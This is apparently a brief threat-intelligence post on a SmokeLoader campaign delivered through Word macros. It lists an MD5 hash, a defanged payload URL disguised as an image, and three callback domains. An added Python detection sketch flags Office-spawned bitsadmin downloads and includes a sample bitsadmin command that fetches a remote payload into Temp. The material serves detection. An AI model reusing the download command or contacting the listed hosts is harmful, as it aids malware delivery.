A SmokeLoader campaign has been active in the wild for the past few weeks. It is sent through Word documents attached to emails.
MD5 hash: e6671e44ed357802439d0b9fbce344bf
Macro -> bitsadmin -> download Binary from URL: hxxp://89.248.169.136/bigmac.jpg
Callback servers:
hxxps://securityupdateserver1.com/blog/wp.php
hxxps://securityupdateserver2.com/blog/wp.php
hxxps://securityupdateserver3.com/blog/wp.php
All details of the evasion techniques used by SmokeLoader are mentioned here: http://www.pwncode.club/2017/10/evasion ... -wild.html
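A detection sketch for the delivery chain described above (Office macro launching bitsadmin to fetch a binary named like an image), added here as an example and not part of the original post. The event field names, the sample command line and the address 192.0.2.10 are constructed assumptions, not data from the campaign.

```python
import ipaddress
import re
from pathlib import PureWindowsPath
from urllib.parse import urlparse

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (field names are hypothetical).
# 192.0.2.10 is a documentation address, not an indicator from the post.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job1 /download /priority high "
                     r"http://192.0.2.10/payload.jpg C:\Users\u\AppData\Local\Temp\a.exe"},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": "bitsadmin /list /allusers"},
]


def _basename(path):
    return PureWindowsPath(path).name.lower()


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_event(event):
    """Return the reasons an event matches the chain (empty list = no match)."""
    if _basename(event["image"]) != "bitsadmin.exe":
        return []
    reasons = []
    if _basename(event["parent_image"]) in OFFICE_PARENTS:
        reasons.append("bitsadmin spawned by Office application")
    for url in URL_RE.findall(event["command_line"]):
        parsed = urlparse(url)
        if _is_ip_literal(parsed.hostname or ""):
            reasons.append("download from raw IP address")
        if PureWindowsPath(parsed.path).suffix.lower() in IMAGE_EXTS:
            reasons.append("remote file has image extension")
    return reasons
```

Each reason is a separate signal, so a rule can alert on the Office parent alone and use the other two to raise severity.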